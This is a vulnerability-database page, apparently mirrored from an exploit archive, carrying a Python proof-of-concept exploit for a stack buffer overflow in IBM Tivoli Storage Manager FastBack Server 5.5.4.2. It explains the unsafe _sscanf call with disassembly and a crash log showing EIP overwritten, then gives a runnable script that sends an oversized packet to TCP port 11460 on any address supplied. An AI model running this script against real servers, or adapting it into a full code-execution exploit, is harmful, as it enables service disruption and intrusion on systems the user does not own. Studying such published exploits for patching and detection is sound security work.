Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow E

🗓️ 15 Dec 2015 00:00:00Reported by Ptrace SecurityType 
zdt
 zdt🔗 0day.today👁 32 Views

IBM Tivoli Storage Manager FastBack Server 5.5.4.2 stack buffer overflo

Code
#!/usr/bin/python
#         
################################################################################
#
#            Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
#                   _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability
#             Date: 14 December 2015
#           Author: Gianni Gnesa (gnix) 
#
#  Vendor Homepage: http://www.ibm.com/
#    Software Name: IBM Tivoli Storage Manager FastBack 
# Software Version: 5.5.4.2 (x86)
#    Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
#                   - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy" 
#                     (Version 5.5.4.2, Size: 120.7 MB)
#
#        Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Vulnerability:
# ==============
#
# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk 
# function caused by the insecure usage of _sscanf while parsing user-controlled 
# input.
#
# .text:0057898E      lea     eax, [ebp+var_210]
# .text:00578994      push    eax
# .text:00578995      lea     ecx, [ebp+var_108]
# .text:0057899B      push    ecx
# .text:0057899C      lea     edx, [ebp+var_20C]
# .text:005789A2      push    edx
# .text:005789A3      lea     eax, [ebp+var_4]
# .text:005789A6      push    eax
# .text:005789A7      lea     ecx, [ebp+var_104]      <=== Buffer that will be overwritten
# .text:005789AD      push    ecx
# .text:005789AE      push    offset $SG128635 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
# .text:005789B3      mov     edx, [ebp+Src]
# .text:005789B6      push    edx             ; Src   <=== Buffer under our control
# .text:005789B7      call    _sscanf                 <=== Stack Buffer Overflow!!!
#
################################################################################
#
# Crash:
# ======
#
# (b44.9dc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=01cd4fb8 ecx=01dacf8c edx=776870b4 esi=01cd4fb8 edi=00000000
# eip=41414141 esp=01dae328 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 41414141 ??              ???
#
################################################################################
 
import sys
import time
import socket
from struct import pack
 
 
def create_pkt(opcode, p1="", p2="", p3=""):
 
    # psAgentCommand (0x30 bytes)
    buf = "\x44" * 0xC
    buf+= pack("<L", opcode)         # opcode
 
    buf+= pack("<i", 0x0)                # 1st memcpy: offset (in psCommandBuffer.data) for Src field 
    buf+= pack("<i", len(p1))            # 1st memcpy: size field
    buf+= pack("<i", len(p1))            # 2nd memcpy: offset (in psCommandBuffer.data) for Src field
    buf+= pack("<i", len(p2))            # 2nd memcpy: size field
    buf+= pack("<i", len(p1) + len(p2))  # 3rd memcpy: offset (in psCommandBuffer.data) for Src field
    buf+= pack("<i", len(p3))            # 3rd memcpy: size field
 
    buf+= "\x44\x44\x44\x44"
    buf+= "\x44\x44\x44\x44"
 
    # psCommandBuffer
    buf+= p1
    buf+= p2
    buf+= p3
     
    # buf len - 4 because the packet length is not included
    buf = pack(">i", len(buf)-4) + buf
     
    return buf
     
     
def main():
    if len(sys.argv) != 2:
        print "Usage: %s <ip_address>\n" % sys.argv[0]
        sys.exit(1)
 
    server = sys.argv[1]
    port = 11460
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((server, port))
     
    pkt = create_pkt(   opcode=0x531,
                        p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
                        p2 = "B" * 24000,
                        p3 = "C" * 24000 )
 
    s.send(pkt) 
    s.close()
     
    print "[+] Packet sent."
    sys.exit(0) 
     
     
if __name__ == "__main__":
    main()

#  0day.today [2018-03-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Dec 2015 00:00Current
7High risk
Vulners AI Score7
ibm tivoli storage managerfastback servervulnerabilitystack buffer overflowinsecure usage_fxcli_getconffilechunkuser-controlled inputexploitwindows 7 professionalvulnerability testingnetworkpacket creation
32